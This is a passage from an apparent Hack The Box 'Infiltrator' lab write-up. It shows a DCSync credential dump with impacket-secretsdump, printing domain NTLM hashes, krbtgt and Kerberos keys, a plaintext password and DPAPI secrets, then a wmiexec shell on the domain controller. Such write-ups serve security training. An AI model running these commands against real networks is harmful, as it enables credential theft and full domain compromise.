DCSync

Performing the DCSync attack using the TGT of the administrator user

Hashdump

┌──(kali㉿kali)-[~/…/htb/labs/infiltrator/adcs]
└─$ KRB5CCNAME=administrator@dc01.infiltrator.htb.ccache impacket-secretsdump INFILTRATOR.HTB/@dc01.infiltrator.htb -k -no-pass -dc-ip $IP  -debug                        
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[+] Using Kerberos Cache: administrator@dc01.infiltrator.htb.ccache
[+] SPN CIFS/DC01.INFILTRATOR.HTB@INFILTRATOR.HTB not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for KRBTGT/INFILTRATOR.HTB@INFILTRATOR.HTB
[+] Using TGT from cache
[+] Username retrieved from CCache: administrator
[+] Trying to connect to KDC at 10.129.180.75:88
[+] Service RemoteRegistry is already running
[+] Retrieving class info for JD
[+] Retrieving class info for Skew1
[+] Retrieving class info for GBG
[+] Retrieving class info for Data
[*] Target system bootKey: 0xb69149edc42a85733e4efe5e35a33e87
[+] Checking NoLMHash Policy
[+] LMHashes are NOT being stored
[+] Saving remote SAM database
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[+] Calculating HashedBootKey from SAM
[+] NewStyle hashes is: True
Administrator:500:aad3b435b51404eeaad3b435b51404ee:4dc8e10f3a29237b05bdfdb5bded5451:::
[+] NewStyle hashes is: True
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] NewStyle hashes is: True
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[+] Saving remote SECURITY database
[*] Dumping cached domain logon information (domain/username:hash)
[+] Decrypting LSA Key
[+] Decrypting NL$KM
[+] Looking into NL$1
[+] Looking into NL$2
[+] Looking into NL$3
[+] Looking into NL$4
[+] Looking into NL$5
[+] Looking into NL$6
[+] Looking into NL$7
[+] Looking into NL$8
[+] Looking into NL$9
[+] Looking into NL$10
[*] Dumping LSA Secrets
[+] Looking into $MACHINE.ACC
[*] $MACHINE.ACC 
[+] Could not calculate machine account Kerberos keys, only printing plain password (hex encoded)
INFILTRATOR\DC01$:plain_password_hex:0a3183391dac772712b98e94fead3b9456bfedcc57c953d18084f50e94cf42d6c08434a1d3217c2fe151916a0ae7867c415ab8d3546f4ecc4707410ca56e2556aef2298066f7842ec1ad4819706032c10db5d22ff762c9a4fdeb82405627c04ed0ae8ee0514170acb1f0fa8964a2d045ba16b749ef89933bccd53b25a8aa0f5d17c2d519f9aa7a939b1fb9701bb88a1abb5efdfbcd02226e09032d8ffced8801e6cf8adf16bceb1491482d23a8281326cc82a6fa06425336d1422cd3b1cadd389263a9f557ce5221a86b28a71dc6276a0ac8165b7c5c5929dd3998130bbd7b9e41b9a8e4d69e1b7a614f25b6a8aa672b
INFILTRATOR\DC01$:aad3b435b51404eeaad3b435b51404ee:c4d8ecef85fdd70a87fa9c8da56a417f:::
[+] Looking into DefaultPassword
[*] DefaultPassword 
INFILTRATOR\Administrator:Infiltrator_Box1337!
[+] Looking into DPAPI_SYSTEM
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xbd8a15f7e24918ac40db6b340498aeda032c4fc0
dpapi_userkey:0xf0f81997f3c057103ab87ac71dc986c455880e83
[+] Looking into NL$KM
[*] NL$KM 
 0000   A9 F8 C1 38 F1 FB 53 1A  E1 12 CA 8A 61 D3 C1 D6   ...8..S.....a...
 0010   67 09 77 BC BC C6 BC 2F  5D E3 18 3D 66 DB 6D 9F   g.w..../]..=f.m.
 0020   03 30 80 2D 25 9F 69 56  39 55 EA A3 50 D0 CA 0F   .0.-%.iV9U..P...
 0030   C6 18 45 14 9E 8E B6 3C  46 49 6F 3B FA EF FE 89   ..E....<FIo;....
NL$KM:a9f8c138f1fb531ae112ca8a61d3c1d6670977bcbcc6bc2f5de3183d66db6d9f0330802d259f69563955eaa350d0ca0fc61845149e8eb63c46496f3bfaeffe89
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[+] Session resume file will be sessionresume_ZnEfRYca
[+] Trying to connect to KDC at 10.129.180.75:88
[+] Calling DRSGetNCChanges for S-1-5-21-2606098828-3734741516-3625406802-500 
[+] SID lookup unsuccessful, falling back to DRSCrackNames/GUID lookups
[+] Calling DRSCrackNames for S-1-5-21-2606098828-3734741516-3625406802-500 
[+] Calling DRSGetNCChanges for {f3f4f5a3-708a-47f6-966f-4b247ec76492} 
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Administrator,CN=Users,DC=infiltrator,DC=htb
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1356f502d2764368302ff0369b1121a1:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSCrackNames for S-1-5-21-2606098828-3734741516-3625406802-501 
[+] Calling DRSGetNCChanges for {4adb7eb1-fb0c-4cb3-b8f2-8d4ba8d1f02d} 
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Guest,CN=Users,DC=infiltrator,DC=htb
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSCrackNames for S-1-5-21-2606098828-3734741516-3625406802-502 
[+] Calling DRSGetNCChanges for {09e6a8b4-1bfd-4127-80e4-7aa81dc8dd6f} 
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=krbtgt,CN=Users,DC=infiltrator,DC=htb
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d400d2ccb162e93b66e8025118a55104:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSCrackNames for S-1-5-21-2606098828-3734741516-3625406802-1103 
[+] Calling DRSGetNCChanges for {b5828c3a-8f36-4b49-b2fb-80d4f38fc7d5} 
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=D.anderson,CN=Users,DC=infiltrator,DC=htb
infiltrator.htb\D.anderson:1103:aad3b435b51404eeaad3b435b51404ee:627a2cb0adc7ba12ea11174941b3da88:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSCrackNames for S-1-5-21-2606098828-3734741516-3625406802-1104 
[+] Calling DRSGetNCChanges for {42c540c8-25fa-4063-abee-4c564e30a726} 
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=L.clark,CN=Users,DC=infiltrator,DC=htb
infiltrator.htb\L.clark:1104:aad3b435b51404eeaad3b435b51404ee:627a2cb0adc7ba12ea11174941b3da88:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSCrackNames for S-1-5-21-2606098828-3734741516-3625406802-1105 
[+] Calling DRSGetNCChanges for {c27dc7d3-af00-46f1-86f0-06056b64a5be} 
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=M.harris,CN=Users,DC=infiltrator,DC=htb
infiltrator.htb\M.harris:1105:aad3b435b51404eeaad3b435b51404ee:3ed8cf1bd9504320b50b2191e8fb7069:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSCrackNames for S-1-5-21-2606098828-3734741516-3625406802-1106 
[+] Calling DRSGetNCChanges for {69617988-a46d-4729-a7ed-4a66f88aeaaf} 
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=O.martinez,CN=Users,DC=infiltrator,DC=htb
infiltrator.htb\O.martinez:1106:aad3b435b51404eeaad3b435b51404ee:daf40bbfbf00619b01402e5f3acd40a9:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSCrackNames for S-1-5-21-2606098828-3734741516-3625406802-1107 
[+] Calling DRSGetNCChanges for {995da9d6-0078-4125-a9cc-6a336722f1b6} 
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=A.walker,CN=Users,DC=infiltrator,DC=htb
infiltrator.htb\A.walker:1107:aad3b435b51404eeaad3b435b51404ee:f349468bb2c669ec8c3fd4154fdfe126:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSCrackNames for S-1-5-21-2606098828-3734741516-3625406802-1108 
[+] Calling DRSGetNCChanges for {065b6def-5e48-45c5-911d-bab5a89d6543} 
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=K.turner,CN=Users,DC=infiltrator,DC=htb
infiltrator.htb\K.turner:1108:aad3b435b51404eeaad3b435b51404ee:a119c0d5af383e9591ebb67857e2b658:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSCrackNames for S-1-5-21-2606098828-3734741516-3625406802-1109 
[+] Calling DRSGetNCChanges for {82441465-3bc3-4ac8-9512-e11b53d042ed} 
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=E.rodriguez,OU=Marketing Digital,DC=infiltrator,DC=htb
infiltrator.htb\E.rodriguez:1109:aad3b435b51404eeaad3b435b51404ee:b02e97f2fdb5c3d36f77375383449e56:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSCrackNames for S-1-5-21-2606098828-3734741516-3625406802-1601 
[+] Calling DRSGetNCChanges for {b3d4184d-4d18-4bce-a377-1e786d162320} 
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=winrm_svc,CN=Users,DC=infiltrator,DC=htb
infiltrator.htb\winrm_svc:1601:aad3b435b51404eeaad3b435b51404ee:120c6c7a0acb0cd808e4b601a4f41fd4:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSCrackNames for S-1-5-21-2606098828-3734741516-3625406802-8101 
[+] Calling DRSGetNCChanges for {15bce2ec-4fa9-44fe-bc24-e800b252f557} 
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=lan_managment,CN=Users,DC=infiltrator,DC=htb
infiltrator.htb\lan_managment:8101:aad3b435b51404eeaad3b435b51404ee:a1983d156e1d0fdf9b01208e2b46670d:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSCrackNames for S-1-5-21-2606098828-3734741516-3625406802-1000 
[+] Calling DRSGetNCChanges for {8a93971a-f449-4c71-9b39-d60657be83fc} 
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=DC01,OU=Domain Controllers,DC=infiltrator,DC=htb
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:c4d8ecef85fdd70a87fa9c8da56a417f:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSCrackNames for S-1-5-21-2606098828-3734741516-3625406802-3102 
[+] Calling DRSGetNCChanges for {2c70ab20-216f-44b3-b392-2e1fddb8567f} 
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=infiltrator_svc,CN=Managed Service Accounts,DC=infiltrator,DC=htb
infiltrator_svc$:3102:aad3b435b51404eeaad3b435b51404ee:52dfec373c144cb8d50334cb73934612:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Finished processing and printing user's hashes, now printing supplemental information
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d9ae321762ce3d90ff7835a9e9a8fe453bcc3b35c0cb212326e0efb2e8b29ba
Administrator:aes128-cts-hmac-sha1-96:762b10a1e2296a49bab7da1ce32755ed
Administrator:des-cbc-md5:0497041f3e5d2598
krbtgt:aes256-cts-hmac-sha1-96:673c00e9dd5ca94e9be6312a159fc1c4e2ef95792ec45f867ec2c1ad439f3150
krbtgt:aes128-cts-hmac-sha1-96:674de1e736dbefda6f24dd914e598d79
krbtgt:des-cbc-md5:a4b9c73bc4a46bcd
infiltrator.htb\D.anderson:aes256-cts-hmac-sha1-96:42447533e9f1c9871ddd2137def662980e677a748b5d184da910d3c4daeb403f
infiltrator.htb\D.anderson:aes128-cts-hmac-sha1-96:021e189e743a78a991616821138e2e69
infiltrator.htb\D.anderson:des-cbc-md5:1529a829132a2345
infiltrator.htb\L.clark:aes256-cts-hmac-sha1-96:dddc0366b026b09ebf0ac3e7a7f190b491c4ee0d7976a4c3b324445485bf1bfc
infiltrator.htb\L.clark:aes128-cts-hmac-sha1-96:5041c75e19de802e0f7614f57edc8983
infiltrator.htb\L.clark:des-cbc-md5:cd023d5d70e6aefd
infiltrator.htb\M.harris:aes256-cts-hmac-sha1-96:90dd4ed523ecc25972afe0b133cad79d5c5b88e6bc5cd1a8d2920ccb45b15596
infiltrator.htb\M.harris:aes128-cts-hmac-sha1-96:bf1e51ae7fa659e146833d8de8ff3d17
infiltrator.htb\M.harris:des-cbc-md5:7fabf8e6e5678a67
infiltrator.htb\O.martinez:aes256-cts-hmac-sha1-96:d497f5a48df0dd55d34c79c7893867a3aad8b222dc7f41af67a1476735c9ed75
infiltrator.htb\O.martinez:aes128-cts-hmac-sha1-96:a062fd39eee45a7ceea3f8e5b7525d10
infiltrator.htb\O.martinez:des-cbc-md5:70f8164a9713ba8c
infiltrator.htb\A.walker:aes256-cts-hmac-sha1-96:cbaeaefb06f17d3eb1d49550e5714fbdf517922c841375cd6a6cd750aa5e3efe
infiltrator.htb\A.walker:aes128-cts-hmac-sha1-96:27b89dea58e7a98cfadc60b2af7ab568
infiltrator.htb\A.walker:des-cbc-md5:a4515dd5d09be9b9
infiltrator.htb\K.turner:aes256-cts-hmac-sha1-96:0f75078e57f71485606fef572b36a278645e2053438e8596c48be7e41e56055a
infiltrator.htb\K.turner:aes128-cts-hmac-sha1-96:fb14214da9c033aa04c0d559abbd3f7a
infiltrator.htb\K.turner:des-cbc-md5:b94a5d234307459b
infiltrator.htb\E.rodriguez:aes256-cts-hmac-sha1-96:52c2444473f775e05ba01744af63901249a018ade7369a262981ce3aeede220a
infiltrator.htb\E.rodriguez:aes128-cts-hmac-sha1-96:9988b989a3d40045326f8908094a79be
infiltrator.htb\E.rodriguez:des-cbc-md5:2f013eea29c7f237
infiltrator.htb\winrm_svc:aes256-cts-hmac-sha1-96:61f308b54f3b17ed48c2877c775a6aa37789b46c1741e356f6fcdab75373d1ca
infiltrator.htb\winrm_svc:aes128-cts-hmac-sha1-96:1d454266ab84bfe7ce7bb03e48a23ac7
infiltrator.htb\winrm_svc:des-cbc-md5:01ce70109ecea73b
infiltrator.htb\lan_managment:aes256-cts-hmac-sha1-96:e66b410341a87c4f1ff382e9c4e3e26d0a351de2ebea9ba0d234b7713cfb0ce6
infiltrator.htb\lan_managment:aes128-cts-hmac-sha1-96:5bf2b52baf80470a2dfe5466c44e9896
infiltrator.htb\lan_managment:des-cbc-md5:b6044c94896e57f1
DC01$:aes256-cts-hmac-sha1-96:15db1652b02a83f4324bd8ba4f2a20eb8ea7631bf87dfec2d4f97ebeff32435d
DC01$:aes128-cts-hmac-sha1-96:70d8ad0059f5e81f43310c34e9937556
DC01$:des-cbc-md5:fb2954402cd32f5e
infiltrator_svc$:aes256-cts-hmac-sha1-96:ff9abf4c80c0c6a64b72a566169a2c17d28b37d72534f97b964449d76628e11b
infiltrator_svc$:aes128-cts-hmac-sha1-96:bcc830aa58603a0079878facd347e2af
infiltrator_svc$:des-cbc-md5:d5d6268ccb01b96d
[*] Cleaning up...

Domain Level Compromise

Shelldrop

┌──(kali㉿kali)-[~/…/htb/labs/infiltrator/adcs]
└─$ KRB5CCNAME=administrator@dc01.infiltrator.htb.ccache impacket-wmiexec INFILTRATOR.HTB/@dc01.infiltrator.htb -k -no-pass -dc-ip $IP  -debug
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[+] Using Kerberos Cache: administrator@dc01.infiltrator.htb.ccache
[+] SPN CIFS/DC01.INFILTRATOR.HTB@INFILTRATOR.HTB not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for KRBTGT/INFILTRATOR.HTB@INFILTRATOR.HTB
[+] Using TGT from cache
[+] Username retrieved from CCache: administrator
[+] Trying to connect to KDC at 10.129.180.75:88
[*] SMBv3.0 dialect used
[+] Using Kerberos Cache: administrator@dc01.infiltrator.htb.ccache
[+] SPN HOST/DC01.INFILTRATOR.HTB@INFILTRATOR.HTB not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for KRBTGT/INFILTRATOR.HTB@INFILTRATOR.HTB
[+] Using TGT from cache
[+] Username retrieved from CCache: administrator
[+] Trying to connect to KDC at 10.129.180.75:88
[+] Target system is dc01.infiltrator.htb and isFQDN is True
[+] StringBinding: dc01[52354]
[+] StringBinding chosen: ncacn_ip_tcp:dc01.infiltrator.htb[52354]
[+] Using Kerberos Cache: administrator@dc01.infiltrator.htb.ccache
[+] SPN HOST/DC01.INFILTRATOR.HTB@INFILTRATOR.HTB not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for KRBTGT/INFILTRATOR.HTB@INFILTRATOR.HTB
[+] Using TGT from cache
[+] Username retrieved from CCache: administrator
[+] Trying to connect to KDC at 10.129.180.75:88
[+] Using Kerberos Cache: administrator@dc01.infiltrator.htb.ccache
[+] SPN HOST/DC01.INFILTRATOR.HTB@INFILTRATOR.HTB not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for KRBTGT/INFILTRATOR.HTB@INFILTRATOR.HTB
[+] Using TGT from cache
[+] Username retrieved from CCache: administrator
[+] Trying to connect to KDC at 10.129.180.75:88
[+] Using Kerberos Cache: administrator@dc01.infiltrator.htb.ccache
[+] SPN HOST/DC01.INFILTRATOR.HTB@INFILTRATOR.HTB not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for KRBTGT/INFILTRATOR.HTB@INFILTRATOR.HTB
[+] Using TGT from cache
[+] Username retrieved from CCache: administrator
[+] Trying to connect to KDC at 10.129.180.75:88
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\> whoami
infiltrator\administrator
 
C:\> hostname
dc01
 
C:\> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : .htb
   IPv4 Address. . . . . . . . . . . : 10.129.180.75
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 10.129.0.1

System Level Compromise

InfoSec LAB

Explorer

Infiltrator_Privilege_Escalation

DCSync

Hashdump

Shelldrop

Interactive Graph View

Table of Contents

Backlinks